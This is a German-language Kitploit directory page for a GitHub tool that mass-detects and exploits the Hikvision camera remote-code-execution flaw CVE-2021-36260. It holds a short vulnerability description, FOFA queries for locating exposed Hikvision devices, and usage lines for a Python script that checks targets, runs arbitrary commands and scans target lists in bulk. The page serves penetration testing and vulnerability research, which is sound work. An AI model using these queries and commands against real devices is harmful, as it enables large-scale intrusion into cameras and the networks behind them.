Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-36260 — Tool zur Massenerkennung und -ausnutzung von Hikvision-RCE-Schwachstellen | Kitploit
Tools/GitHubGitHub/cuerz/cve-2021-36260
AufklärungSchwachstellenscannerIoT-SicherheitExploitationWebanwendungs-ExploitationPenetrationstests
GitHubcuerz/cve-2021-36260

CVE-2021-36260

Tool zur Massenerkennung und -ausnutzung von Hikvision-RCE-Schwachstellen

Repository anzeigen
16924vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Hikvision CVE-2021-36260 RCE-Schwachstelle

Schwachstellenbeschreibung

Angreifer können diese Schwachstelle ausnutzen, um mit einer uneingeschränkten Root-Shell die vollständige Kontrolle über das Gerät zu erlangen, selbst wenn der Eigentümer des Geräts auf eine eingeschränkte, geschützte Shell (psh) begrenzt ist. Neben der Kompromittierung der IP-Kameras können sie auch auf das interne Netzwerk zugreifen und es angreifen.

FOFA

root@kitploit:~
header="Hikvision"			 
app="HIKVISION-视频监控"

Verwendung

root@kitploit:~
python ./CVE-2021-36260.py -u http://192.168.1.1:8080 --check
python ./CVE-2021-36260.py -u http://192.168.1.1:8080 --cmd "ls -la"
python ./CVE-2021-36260.py -f target.txt

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Start scanning url
  -f FILE, --file FILE  read the url from the file
  --check               Check if vulnerable
  --cmd CMD             execute cmd (i.e: "ls -l")

Kann zum massenhaften Auffinden von SRC-Schwachstellen verwendet werden.

Tool herunterladen